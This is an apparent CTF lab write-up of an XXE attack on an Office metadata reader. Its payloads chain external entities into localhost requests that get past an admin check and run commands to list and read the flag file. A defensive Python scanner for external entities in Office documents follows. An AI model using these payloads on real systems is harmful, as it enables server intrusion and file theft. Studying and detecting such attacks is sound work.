Firebird - Office Meta Reader 2

tags: [[CTF]] [[firebird training]] [[XXE]]

Firebird Homework 9-B Office Meta Reader 2

Bypass 127.0.0.1 Local Access Limit

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/special-http-headers

  1. XXE to make server-side request to admin.php

  2. Rewrite IP source

Attempt 1 failed.
Return: <h1>Admin panel only accessible from localhost (127.0.0.1)! Go away hackers</h1>
Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://chal.firebird.sh:35043/admin.php"> ]>

Attempt 2 succeeded.
Return:
Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]>

Saw that http://localhost can bypass the check. This is what a user can see on admin.php.
Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php"> ]>

Tried injecting a payload: ls was successful!
Return:
Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php?cmd=ls"> ]>

Find the flag in the root folder (list the root folder).
Payload: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php?cmd=ls%20/"> ]>
Success! Saw two flag files.

Found the Flag!

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:35043/admin.php?cmd=cat%20/flag_2473f16d78231ab2ce2addc4f5fe7dd6"> ]>
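From the defender's side, the weak link in this chain is an XML parser that honours external entity declarations in uploaded Office documents; the localhost check on admin.php does nothing once the server itself makes the request. As an added example (not part of the challenge or this writeup), a Python scanner that walks the XML parts of an OOXML container, refuses to resolve any external entity, and reports what was declared or referenced. The two sample parts and the placeholder host are constructed for the demo.

```python
import io
import zipfile
import xml.parsers.expat

# Constructed sample XML parts (not from the challenge): one benign, one carrying an
# external entity in the internal DTD subset in the style of the payloads above.
BENIGN_PART = b'<?xml version="1.0"?><coreProperties><title>Report</title></coreProperties>'
XXE_PART = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE replace [<!ENTITY xxe SYSTEM '
            b'"php://filter/read=convert.base64-encode/resource=http://localhost/admin.php"> ]>'
            b'<coreProperties><title>&xxe;</title></coreProperties>')

def find_external_entities(xml_bytes):
    """Report (name, system_id) for each external entity declared or referenced; never resolves them."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities have no system/public id; anything with one points outside the document.
        if system_id is not None or public_id is not None:
            findings.append((name, system_id))
    def on_external_ref(context, base, system_id, public_id):
        findings.append(("<reference>", system_id))
        return 0  # refuse the fetch; expat aborts the parse here
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError:
        pass  # aborted or malformed input: anything found so far is still reported
    return findings

def scan_office_document(zip_bytes):
    """Scan every XML part of an OOXML container; returns {part_name: findings}."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith((".xml", ".rels")):
                hits = find_external_entities(zf.read(name))
                if hits:
                    report[name] = hits
    return report

def build_sample(parts):
    """Constructed helper: build an in-memory zip from {name: bytes} for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()
```

Any non-empty report is grounds to reject the upload before the real parser sees it; the same handler configuration (refusing external references) is also the fix on the parsing side.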
